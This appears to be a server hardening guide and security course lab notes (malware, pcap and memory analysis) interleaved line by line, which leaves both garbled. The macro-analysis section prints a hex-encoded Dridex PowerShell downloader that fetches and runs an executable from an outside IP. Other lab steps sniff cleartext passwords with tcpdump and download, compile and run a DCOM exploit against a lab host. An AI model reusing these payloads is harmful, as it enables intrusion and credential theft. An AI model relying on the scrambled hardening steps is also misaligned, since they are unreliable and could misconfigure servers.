if you change the SSH port keep the port number below 1024 as these are priviledged ports that can only be opened by root or processes running as root. 

If you change the SSH port also open the new port you have chosen on the firewall and close port 22.
unzip master.zip
Open a Terminal Window and enter :

sudo vi /etc/ssh/sshd_config
cd malwarescanner-master/
Change or add the following and save.

Port <ENTER YOUR PORT>
python scanner.py -h
Protocol 2

PermitRootLogin no
cat strings.txt
DebianBanner no

Restart SSH server, open a Terminal Window and enter :
cat hashes.txt
sudo service ssh restart

4. Apache SSL Hardening - disable SSL v2/v3 support.
mkdir ~/Desktop/malcode
 
The SSL v2/v3 protocol has been proven to be insecure. 
cp ~/Desktop/malware.exe ~/Desktop/malcode
We will disable Apache support for the protocol and force the use of the newer protocols. 

Open a Terminal Window and enter :
python scanner.py -H hashes.txt -D ~/Desktop/malcode/ strings.txt
sudo vi /etc/apache2/mods-available/ssl.conf

Change this line from :
cd ~/Desktop/
SSLProtocol all -SSLv3
 -----------------------------------------------------------------------
To the following and save.

SSLProtocol all -SSLv2 -SSLv3

Restart the Apache server, open a Terminal Window and enter :
#####################################################
sudo service apache2 restart
# Analyzing Macro Embedded Malware                  #
5. Protect su by limiting access only to admin group.
# Reference:                                        #
# https://jon.glass/analyzes-dridex-malware-p1/     #
To limit the use of su by admin users only we need to create an admin group, then add users and limit the use of su to the admin group.
#####################################################
Add a admin group to the system and add your own admin username to the group by replacing <YOUR ADMIN USERNAME> below with your admin username.
---------------------------Type This-----------------------------------
Open a terminal window and enter:
cd ~/Desktop/
sudo groupadd admin

sudo usermod -a -G admin <YOUR ADMIN USERNAME>

sudo dpkg-statoverride --update --add root admin 4750 /bin/su
sudo pip install olefile
6. Harden network with sysctl settings.
     
 
The /etc/sysctl.conf file contain all the sysctl settings.
mkdir ~/Desktop/oledump
Prevent source routing of incoming packets and log malformed IP's enter the following in a terminal window:

sudo vi /etc/sysctl.conf
cd ~/Desktop/oledump
Edit the /etc/sysctl.conf file and un-comment or add the following lines :

# IP Spoofing protection
wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
net.ipv4.conf.all.rp_filter = 1

net.ipv4.conf.default.rp_filter = 1
unzip oledump_V0_0_22.zip
 
# Ignore ICMP broadcast requests
wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
net.ipv4.icmp_echo_ignore_broadcasts = 1

unzip 064016.zip
# Disable source packet routing
     infected
net.ipv4.conf.all.accept_source_route = 0

net.ipv6.conf.all.accept_source_route = 0 
python oledump.py 064016.doc
net.ipv4.conf.default.accept_source_route = 0

net.ipv6.conf.default.accept_source_route = 0
python oledump.py 064016.doc -s A4 -v
-----------------------------------------------------------------------
# Ignore send redirects

net.ipv4.conf.all.send_redirects = 0

net.ipv4.conf.default.send_redirects = 0

- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
# Block SYN attacks
- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
net.ipv4.tcp_syncookies = 1

net.ipv4.tcp_max_syn_backlog = 2048
---------------------------Type This-----------------------------------
net.ipv4.tcp_synack_retries = 2
python oledump.py 064016.doc -s A5 -v
net.ipv4.tcp_syn_retries = 5
-----------------------------------------------------------------------
 
# Log Martians
- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
net.ipv4.conf.all.log_martians = 1

net.ipv4.icmp_ignore_bogus_error_responses = 1
---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A3 -v
# Ignore ICMP redirects

net.ipv4.conf.all.accept_redirects = 0
- Look for "GVhkjbjv" and you should see:
net.ipv6.conf.all.accept_redirects = 0

net.ipv4.conf.default.accept_redirects = 0 
636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
net.ipv6.conf.default.accept_redirects = 0

- Take that long blob that starts with 636D and finishes with 653B and paste it in:
# Ignore Directed pings
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
net.ipv4.icmp_echo_ignore_all = 1

To reload sysctl with the latest changes, enter:

sudo sysctl -p

7. Disable Open DNS Recursion and Remove Version Info  - BIND DNS Server.

##############
Open a Terminal and enter the following :
# Yara Ninja #
sudo vi /etc/bind/named.conf.options

Add the following to the Options section :
---------------------------Type This-----------------------------------
recursion no;
sudo apt-get remove -y yara
version "Not Disclosed";

Restart BIND DNS server. Open a Terminal and enter the following :

sudo service bind9 restart
wget https://github.com/plusvic/yara/archive/v3.4.0.zip
8. Prevent IP Spoofing.

sudo apt-get -y install libtool
Open a Terminal and enter the following :

sudo vi /etc/host.conf

Add or edit the following lines :
unzip v3.4.0.zip
order bind,hosts

nospoof on
cd yara-3.4.0
9. Harden PHP for security.

./bootstrap.sh
Edit the php.ini file :

sudo vi /etc/php5/apache2/php.ini
./configure
Add or edit the following lines an save :

disable_functions = exec,system,shell_exec,passthru
make
register_globals = Off

expose_php = Off
sudo make install
display_errors = Off

track_errors = Off

html_errors = Off
yara -v
magic_quotes_gpc = Off

mail.add_x_header = Off

session.name = NEWSESSID

Restart Apache server. Open a Terminal and enter the following :
wget https://github.com/Yara-Rules/rules/archive/master.zip
sudo service apache2 restart

10. Restrict Apache Information Leakage.
unzip master.zip
 
Edit the Apache2 configuration security file :
cd ~/Desktop
sudo vi /etc/apache2/conf-available/security.conf

Add or edit the following lines and save :
yara rules-master/packer.yar malcode/malware.exe
ServerTokens Prod
 -----------------------------------------------------------------------
ServerSignature Off

TraceEnable Off
Places to get more Yara rules:
Header unset ETag
------------------------------
Header always unset X-Powered-By
https://malwareconfig.com/static/yaraRules/
FileETag None
https://github.com/kevthehermit/YaraRules
Restart Apache server. Open a Terminal and enter the following :
https://github.com/VectraThreatLab/reyara
sudo service apache2 restart

11. Web Application Firewall - ModSecurity.

 
See : How to install apache2 mod_security and mod_evasive on Ubuntu 12.04 LTS server
Yara rule sorting script:
12. Protect from DDOS (Denial of Service) attacks - ModEvasive
-------------------------
https://github.com/mkayoh/yarasorter
See : How to install apache2 mod_security and mod_evasive on Ubuntu 12.04 LTS server

13. Scan logs and ban suspicious hosts - DenyHosts and Fail2Ban.

---------------------------Type This-----------------------------------
DenyHosts is a python program that automatically blocks SSH attacks by adding entries to /etc/hosts.deny. DenyHosts will also inform Linux administrators about offending hosts, attacked users and suspicious logins.
cd ~/Desktop/rules-master
Open a Terminal and enter the following :
for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar
sudo apt-get install denyhosts
cd ~/Desktop/
After installation edit the configuration file /etc/denyhosts.conf  and change the email, and other settings as required.
yara rules-master/master.yar malcode/malware.exe
To edit the admin email settings open a terminal window and enter:
 -----------------------------------------------------------------------
sudo vi /etc/denyhosts.conf

Change the following values as required on your server :

ADMIN_EMAIL = root@localhost

SMTP_HOST = localhost

SMTP_PORT = 25

#SMTP_USERNAME=foo

#SMTP_PASSWORD=bar

SMTP_FROM = DenyHosts nobody@localhost

#SYSLOG_REPORT=YES 

Fail2ban is more advanced than DenyHosts as it extends the log monitoring to other services including SSH, Apache, Courier, FTP, and more.
Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
Fail2ban scans log files and bans IPs that show the malicious signs -- too many password failures, seeking for exploits, etc.
http://derekmorton.name/files/malware_12-14-12.sql.bz2
Generally Fail2Ban then used to update firewall rules to reject the IP addresses for a specified amount of time, although any arbitrary other action could also be configured.

Out of the box Fail2Ban comes with filters for various services (apache, courier, ftp, ssh, etc).

Open a Terminal and enter the following :
Malware Repositories:
sudo apt-get install fail2ban
http://malshare.com/index.php
After installation edit the configuration file /etc/fail2ban/jail.local  and create the filter rules as required.
http://www.malwareblacklist.com/
To edit the settings open a terminal window and enter:
http://www.virusign.com/
sudo vi /etc/fail2ban/jail.conf
http://virusshare.com/
Activate all the services you would like fail2ban to monitor by changing enabled = false to enabled = true
http://www.tekdefense.com/downloads/malware-samples/
For example if you would like to enable the SSH monitoring and banning jail, find the line below and change enabled from false to true. Thats it.

[sshd]

 
enabled  = true

port     = ssh

filter   = sshd
# Creating a Malware Database #
logpath  = /var/log/auth.log

maxretry = 3

If you have selected a non-standard SSH port in step 3 then you need to change the port setting in fail2ban from ssh which by default is port 22, to your new port number, for example if you have chosen 1234 then port = 1234
Creating a malware database (sqlite)
[sshd]
---------------------------Type This-----------------------------------
sudo apt-get install -y python-simplejson python-simplejson-dbg
enabled  = true

port     = <ENTER YOUR SSH PORT NUMBER HERE>

filter   = sshd
wget https://s3.amazonaws.com/infosecaddictsfiles/avsubmit.py
logpath  = /var/log/auth.log
wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip
maxretry = 3

If you would like to receive emails from Fail2Ban if hosts are banned change the following line to your email address.
unzip malware-password-is-infected.zip
destemail = root@localhost
    infected
and change the following line from :

action = %(action_)s
python avsubmit.py --init
to:

action = %(action_mwl)s
python avsubmit.py -f malware.exe -e
You can also create rule filters for the various services that you would like fail2ban to monitor that is not supplied by default.
 -----------------------------------------------------------------------
sudo vi /etc/fail2ban/jail.local

Good instructions on how to configure fail2ban and create the various filters can be found on HowtoForge - click here for an example

When done with the configuration of Fail2Ban restart the service with :

sudo service fail2ban restart

You can also check the status with.
Creating a malware database (mysql)
sudo fail2ban-client status

14. Intrusion Detection - PSAD.
- Step 1: Installing MySQL database
- Run the following command in the terminal:
Cipherdyne PSAD is a collection of three lightweight system daemons that run on Linux machines and analyze iptables log messages to detect port scans and other suspicious traffic.
---------------------------Type This-----------------------------------
To install the latest version from the source files follow these instruction : How to install PSAD Intrusion Detection on Ubuntu 12.04 LTS server
sudo apt-get install mysql-server
OR install the older version from the Ubuntu software repositories, open a Terminal and enter the following :

sudo apt-get install psad
     
Then for basic configuration see How to install PSAD Intrusion Detection on Ubuntu 12.04 LTS server and follow from step 2:
- Step 2: Installing Python MySQLdb module
15. Check for rootkits - RKHunter and CHKRootKit.
- Run the following command in the terminal:
---------------------------Type This-----------------------------------
Both RKHunter and CHKRootkit basically do the same thing - check your system for rootkits. No harm in using both.
sudo apt-get build-dep python-mysqldb
Open a Terminal and enter the following :

sudo apt-get install rkhunter chkrootkit

To run chkrootkit open a terminal window and enter :
sudo apt-get install python-mysqldb
sudo chkrootkit

To update and run RKHunter. Open a Terminal and enter the following :
 -----------------------------------------------------------------------
sudo rkhunter --update

sudo rkhunter --propupd
Step 3: Logging in
sudo rkhunter --check
Run the following command in the terminal:
16. Scan open ports - Nmap.
---------------------------Type This-----------------------------------
mysql -u root -p                    (set a password of 'malware')
Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing.

Open a Terminal and enter the following :
- Then create one database by running following command:
sudo apt-get install nmap
---------------------------Type This-----------------------------------
Scan your system for open ports with :
create database malware;
nmap -v -sT localhost

SYN scanning with the following :
exit;
sudo nmap -v -sS localhost

17. Analyse system LOG files - LogWatch.
wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
 
Logwatch is a customizable log analysis system. Logwatch parses through your system's logs and creates a report analyzing areas that you specify. Logwatch is easy to use and will work right out of the package on most systems.
vi mal_to_db.py                     (fill in database connection information)
Open a Terminal and enter the following :

sudo apt-get install logwatch libdate-manip-perl
python mal_to_db.py -i
To view logwatch output use less :
 -----------------------------------------------------------------------
sudo logwatch | less

To email a logwatch report for the past 7 days to an email address, enter the following and replace mail@domain.com with the required email. :
------- check it to see if the files table was created ------
sudo logwatch --mailto mail@domain.com --output mail --format html --range 'between -7 days and today' 

18. Apparmor - Application Armor.
mysql -u root -p
    malware
More information can be found here. Ubuntu Server Guide - Apparmor

It is installed by default since Ubuntu 7.04. 
show databases;
Open a Terminal and enter the following :

sudo apt-get install apparmor apparmor-profiles
use malware;
Check to see if things are running :

sudo apparmor_status
show tables;
19. Audit your system security - Tiger and Tripwire.

describe files;
Tiger is a security tool that can be use both as a security audit and intrusion detection system.

Tripwire is a host-based intrusion detection system (HIDS) that checks file and folder integrity. 
exit;
Open a Terminal and enter the following :

sudo apt-get install tiger tripwire

To setup Tripwire good installation guides can be found on Digital Ocean here and on Unixmen here

To run tiger enter :

sudo tiger
- Now add the malicious file to the DB
All Tiger output can be found in the /var/log/tiger
---------------------------Type This-----------------------------------
To view the tiger security reports, open a Terminal and enter the following :
python mal_to_db.py -f malware.exe -u
sudo less /var/log/tiger/security.report.*
 -----------------------------------------------------------------------
 
 
- Now check to see if it is in the DB
---------------------------Type This-----------------------------------
mysql -u root -p
    malware
 
mysql> use malware;
 
select id,md5,sha1,sha256,time FROM files;
 
mysql> quit;
------------------------------------------------------------------------
 
 
 
# Apache Logs #

#################
# PCAP Analysis #
#################
http://www.the-art-of-web.com/system/logs/
---------------------------Type This-----------------------------------
cd ~/Desktop/
wget https://s3.amazonaws.com/SecureNinja/Python/access_log

mkdir suspiciouspcap/
 
- You want to list all user agents ordered by the number of times they appear (descending order):
cd suspiciouspcap/
 
awk -F\" '{print $6}' access_log | sort | uniq -c | sort -fr
wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
 
wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl
 
- Using the default separator which is any white-space (spaces or tabs) we get the following:

perl chaosreader.pl suspicious-time.pcap
awk '{print $1}' access_log         # ip address (%h)

awk '{print $2}' access_log         # RFC 1413 identity (%l)
firefox index.html
awk '{print $3}' access_log         # userid (%u)

awk '{print $4,5}' access_log       # date/time (%t)
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
awk '{print $9}' access_log         # status code (%>s)

awk '{print $10}' access_log        # size (%b)
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
 
- You might notice that we've missed out some items. To get to them we need to set the delimiter to the " character which changes the way the lines are 'exploded' and allows the following:

for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' |  cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' |  cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host";  done | sort -u
awk -F\" '{print $2}' access_log    # request line (%r)
------------------------------------------------------------------------
awk -F\" '{print $4}' access_log    # referer

awk -F\" '{print $6}' access_log    # user agent

 
####################
awk -F\" '{print $6}' access_log \
# Intro to TCPDump #
  | sed 's/(\([^;]\+; [^;]\+\)[^)]*)/(\1)/' \

  | sort | uniq -c | sort -fr
---------------------------Type This-----------------------------------
sudo apt-get install tcpdump
 
- The next step is to start filtering the output so you can narrow down on a certain page or referer. Would you like to know which pages Google has been requesting from your site?

 
awk -F\" '($6 ~ /Googlebot/){print $2}' access_log | awk '{print $2}'
Basic sniffing
Or who's been looking at your guestbook?
--------------
---------------------------Type This-----------------------------------
awk -F\" '($2 ~ /guestbook\.html/){print $6}' access_log
sudo tcpdump -n
 
 
Now lets increase the display resolution of this packet, or get more details about it. The verbose switch comes in handy
https://blog.nexcess.net/2011/01/21/one-liners-for-apache-log-files/
---------------------------Type This-----------------------------------
sudo tcpdump -v -n
# top 20 URLs from the last 5000 hits

tail -5000 ./access_log | awk '{print $7}' | sort | uniq -c | sort -rn | head -20

tail -5000 ./access_log | awk '{freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20

Getting the ethernet header (link layer headers)
# top 20 URLS excluding POST data from the last 5000 hits
------------------------------------------------
tail -5000 ./access_log | awk -F"[ ?]" '{print $7}' | sort | uniq -c | sort -rn | head -20
In the above examples details of the ethernet header are not printed. Use the -e option to print the ethernet header details as well.
tail -5000 ./access_log | awk -F"[ ?]" '{freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
---------------------------Type This-----------------------------------
sudo tcpdump -vv -n -e
# top 20 IPs from the last 5000 hits
------------------------------------------------------------------------
tail -5000 ./access_log | awk '{print $1}' | sort | uniq -c | sort -rn | head -20

tail -5000 ./access_log | awk '{freq[$1]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
Sniffing a particular interface
-------------------------------
# top 20 URLs requested from a certain ip from the last 5000 hits
In order to sniff a particular network interface we must specify it with the -i switch. First lets get the list of available interfaces using the -D switch.
IP=1.2.3.4; tail -5000 ./access_log | grep $IP | awk '{print $7}' | sort | uniq -c | sort -rn | head -20
---------------------------Type This-----------------------------------
IP=1.2.3.4; tail -5000 ./access_log | awk -v ip=$IP ' $1 ~ ip {freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
sudo tcpdump -D
------------------------------------------------------------------------
# top 20 URLS requested from a certain ip excluding, excluding POST data, from the last 5000 hits

IP=1.2.3.4; tail -5000 ./access_log | fgrep $IP | awk -F "[ ?]" '{print $7}' | sort | uniq -c | sort -rn | head -20
Filtering packets using expressions - Selecting protocols
IP=1.2.3.4; tail -5000 ./access_log | awk -F"[ ?]" -v ip=$IP ' $1 ~ ip {freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
---------------------------------------------------------
---------------------------Type This-----------------------------------
# top 20 referrers from the last 5000 hits
$ sudo tcpdump -n tcp
tail -5000 ./access_log | awk '{print $11}' | tr -d '"' | sort | uniq -c | sort -rn | head -20
------------------------------------------------------------------------
tail -5000 ./access_log | awk '{freq[$11]++} END {for (x in freq) {print freq[x], x}}' | tr -d '"' | sort -rn | head -20

Particular host or port
# top 20 user agents from the last 5000 hits
-----------------------
tail -5000 ./access_log | cut -d\  -f12- | sort | uniq -c | sort -rn | head -20
Expressions can be used to specify source ip, destination ip, and port numbers. The next example picks up all those packets with source address 192.168.1.101
---------------------------Type This-----------------------------------
# sum of data (in MB) transferred in the last 5000 hits
$ sudo tcpdump -n 'src 192.168.1.101'
tail -5000 ./access_log | awk '{sum+=$10} END {print sum/1048576}'
------------------------------------------------------------------------
 
Next example picks up dns request packets, either those packets which originate from local machine and go to port 53 of some other machine.
---------------------------Type This-----------------------------------
$ sudo tcpdump -n 'udp and dst port 53'
------------------------------------------------------------------------
 
wget https://s3.amazonaws.com/StrategicSec-Files/LogAnalysis/cisco.log
To display the FTP packets coming from 192.168.1.100 to 192.168.1.2
---------------------------Type This-----------------------------------
$ sudo tcpdump 'src 192.168.1.100 and dst 192.168.1.2 and port ftp'
------------------------------------------------------------------------
 
Search the network traffic using grep
 
Grep can be used along with tcpdump to search the network traffic. Here is a very simple example
---------------------------Type This-----------------------------------
$ sudo tcpdump -n -A | grep -e 'POST'
------------------------------------------------------------------------
 
So what is the idea behind searching packets. Well one good thing can be to sniff passwords.
Here is quick example to sniff passwords using egrep
 
---------------------------Type This-----------------------------------
tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
------------------------------------------------------------------------
 
 
 
#########
# NGrep #
#########
 
Install ngrep on Ubuntu
---------------------------Type This-----------------------------------
$ sudo apt-get install ngrep
------------------------------------------------------------------------
 
Search network traffic for string "User-Agent: "
---------------------------Type This-----------------------------------
$ sudo ngrep -d eth0 "User-Agent: " tcp and port 80
------------------------------------------------------------------------
In the above command :
a) tcp and port 80 - is the bpf filter (Berkeley Packet Filter) , that sniffs only TCP packet with port number 80
b) The d option specifies the interface to sniff. eth0 in this case.
c) "User-Agent: " is the string to search for. All packets that have that string are displayed.
 
2. Search network packets for GET or POST requests :
---------------------------Type This-----------------------------------
$ sudo ngrep -l -q -d eth0 "^GET |^POST " tcp and port 80
------------------------------------------------------------------------
The l option makes the output buffered and the q option is for quiet ( Be quiet; don't output any information other than packet headers and their payloads (if relevant) ).
 
3. ngrep without any options would simply capture all packets.
---------------------------Type This-----------------------------------
$ sudo ngrep
------------------------------------------------------------------------
 
Reference:
https://dl.packetstormsecurity.net/papers/general/ngreptut.txt
---------------------------Type This-----------------------------------
$ sudo ngrep -d eth0 -n 3
 
$ sudo ngrep -d any port 25
------------------------------------------------------------------------
 
This will let you monitor all activity crossing source or destination port 25
(SMTP).
In order to receive your certificate of proficiency you must complete all of the tasks covered in the Linux For InfoSec pastebin (http://pastebin.com/b5SxBRf6).
---------------------------Type This-----------------------------------
$ sudo ngrep -wi -d wlan0 'user|pass' port 6667
 
$ sudo ngrep -wi -d any 'user|pass' port 21
------------------------------------------------------------------------
 
 
 
Your homework/challenge must be submitted via email to both (joe-at-strategicsec-.-com and kasheia-at-strategicsec-.-com) by Sunday October 16th at midnight EST.

 
#############################
# PCAP Analysis with tshark #
#############################
---------------------------Type This-----------------------------------
sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
 
 
tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
 
 
tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
 
 
tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
 
 
tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
 
 
tshark -r suspicious-time.pcap -Y "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
 
tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
 
tshark -r suspicious-time.pcap -qz ip_hosts,tree
 
tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
 
tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
 
 
whois rapidshare.com.eyu32.ru
 
whois sploitme.com.cn
 
 
tshark -r suspicious-time.pcap -Y http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
 
tshark -r suspicious-time.pcap -Y http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
 
tshark -r suspicious-time.pcap -qz http_req,tree
 
tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
 
tshark -r suspicious-time.pcap -Y http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico'  | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
 
 
 
######################################
# PCAP Analysis with forensicPCAP.py #
######################################
---------------------------Type This-----------------------------------
cd ~/Desktop/suspiciouspcap/
 
wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
 
sudo pip install cmd2==0.7.9
 
 
python forensicPCAP.py suspicious-time.pcap
------------------------------------------------------------------------
 
 
---------------------------Type This-----------------------------------
ForPCAP >>> help
------------------------------------------------------------------------
 
Prints stats about PCAP
---------------------------Type This-----------------------------------
ForPCAP >>> stat
------------------------------------------------------------------------
 
Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
---------------------------Type This-----------------------------------
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
ForPCAP >>> dns
 
ForPCAP >>> show
------------------------------------------------------------------------
 
Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
---------------------------Type This-----------------------------------
ForPCAP >>> dstports
 
ForPCAP >>> show
---------------------------Type This-----------------------------------
 
Prints the number of ip source and store them.
---------------------------Type This-----------------------------------
ForPCAP >>> ipsrc
 
ForPCAP >>> show
------------------------------------------------------------------------
 
Prints the number of web's requests and store them
ForPCAP >>> web
 
ForPCAP >>> show
------------------------------------------------------------------------
 
 
Prints the number of mail's requests and store them
---------------------------Type This-----------------------------------
ForPCAP >>> mail
 
ForPCAP >>> show
------------------------------------------------------------------------
 
 
 
 
 
#############################
# Understanding Snort rules #
#############################
Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
 
Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
 
Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
 
Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
 
Field 5: Traffic Direction (->)
 
Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
 
Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
 
Field 8: MSG - what is actually displayed on the analysts machine
 
 
Let's look at 2 simple rules
----------------------------------------------------------------------------------
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:”NETBIOS DCERPC ISystemActivator \
bind attempt”; flow:to_server,established; content:”|05|”; distance:0; within:1; \
content:”|0b|”; distance:1; within:1; byte_test:1,&,1,0,relative; content:”|A0 01 00 \
00 00 00 00 00 C0 00 00 00 00 00 00 46|”; distance:29; within:16; \
reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
 
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:”NETBIOS SMB DCERPC ISystemActivator bind \
attempt”; flow:to_server,established; content:”|FF|SMB|25|”; nocase; offset:4; \
depth:5; content:”|26 00|”; distance:56; within:2; content:”|5c \
00|P|00|I|00|P|00|E|00 5c 00|”; nocase; distance:5; within:12; content:”|05|”; \
distance:0; within:1; content:”|0b|”; distance:1; within:1; \
byte_test:1,&,1,0,relative; content:”|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
46|”; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
cat /etc/passwd | cut -d:    # List of users
sid:2193; rev:1;)
----------------------------------------------------------------------------------
 
 
 
From your Linux machine ping your Windows machine
---------------------------Type This-----------------------------------
ping 192.168.11.1
-----------------------------------------------------------------------
 
 
Start wireshark and let's create some simple filters:
 
Filter 1:
---------------------------Type This-----------------------------------
ip.addr==192.168.11.1
-----------------------------------------------------------------------
 
Filter 2:
---------------------------Type This-----------------------------------
ip.addr==192.168.11.1 && icmp
-----------------------------------------------------------------------
 
 
Filter 3:
---------------------------Type This-----------------------------------
ip.addr==192.168.11.1 && !(tcp.port==22)
-----------------------------------------------------------------------
Now stop your capture and restart it (make sure you keep the filter)
 
 
 
 
Back to your Linux machine:
[ CTRL-C ] - to stop your ping
---------------------------Type This-----------------------------------
wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c
 
 
gcc -o exploit oc192-dcom.c
 
./exploit
 
 
./exploit -d 192.168.11.1 -t 0
 -----------------------------------------------------------------------
 
 
 
Now go back to WireShark and stop the capture.
 
 
 
 
###################
# Memory Analysis #
###################
---------------------------Type This-----------------------------------
cd  ~/Desktop/
 
sudo apt-get install -y foremost tcpxtract
 
wget https://s3.amazonaws.com/infosecaddictsfiles/hn_forensics.vmem
 
git clone https://github.com/volatilityfoundation/volatility.git
 
cd volatility
sudo pip install distorm3
sudo python setup.py install
python vol.py -h
python vol.py pslist -f ~/Desktop/hn_forensics.vmem
python vol.py connscan -f ~/Desktop/hn_forensics.vmem
mkdir dump/
mkdir -p output/pdf/
python vol.py -f ~/Desktop/hn_forensics.vmem memdmp -p 888 -D dump/
python vol.py -f ~/Desktop/hn_forensics.vmem memdmp -p 1752 -D dump/
                ***Takes a few min***
strings 1752.dmp | grep "^http://" | sort | uniq
strings 1752.dmp | grep "Ahttps://" | uniq -u
cd ..
foremost -i ~/Desktop/volatility/dump/1752.dmp -t pdf -o output/pdf/
cd ~/Desktop/volatility/output/pdf/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf
 
 
 
cd ~/Desktop/volatility/output/pdf/
wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
unzip pdf-parser_V0_6_4.zip
python pdf-parser.py -s javascript --raw pdf/00601560.pdf
python pdf-parser.py --object 11 00600328.pdf
python pdf-parser.py --object 1054 --raw --filter 00601560.pdf > malicious.js
 
cat malicious.js
 -----------------------------------------------------------------------
 
 
 
 
*****Sorry - no time to cover javascript de-obfuscation today*****
 
 
 
 
---------------------------Type This-----------------------------------
cd ~/Desktop/volatility
mkdir files2/
python vol.py -f ~/Desktop/hn_forensics.vmem dumpfiles -D files2/
python vol.py hivescan -f ~/Desktop/hn_forensics.vmem                                  
python vol.py printkey -o 0xe1526748 -f ~/Desktop/hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon 
-----------------------------------------------------------------------
 
 
                            ######################
- Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
----------- ############### # Intro to Reversing # ############### -----------
                            ######################
Lab walk-through documents are in the zip file along with the executables that need to be reversed:
https://s3.amazonaws.com/infosecaddictsfiles/Lena151.zip





##############################
# Linux For InfoSec Homework #
##############################
In order to receive your certificate of attendance you must complete the all of the quizzes on the http://linuxsurvival.com/linux-tutorial-introduction/ website.


Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Linux-For-InfoSec-Homework.docx)




##############################
# Linux For InfoSe Challenge #
##############################

In order to receive your certificate of proficiency you must complete all of the tasks covered in the Linux For InfoSec pastebin (http://pastebin.com/eduSfPy3).

Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Linux-For-InfoSec-Challenge.docx)




IMPORTANT NOTE:
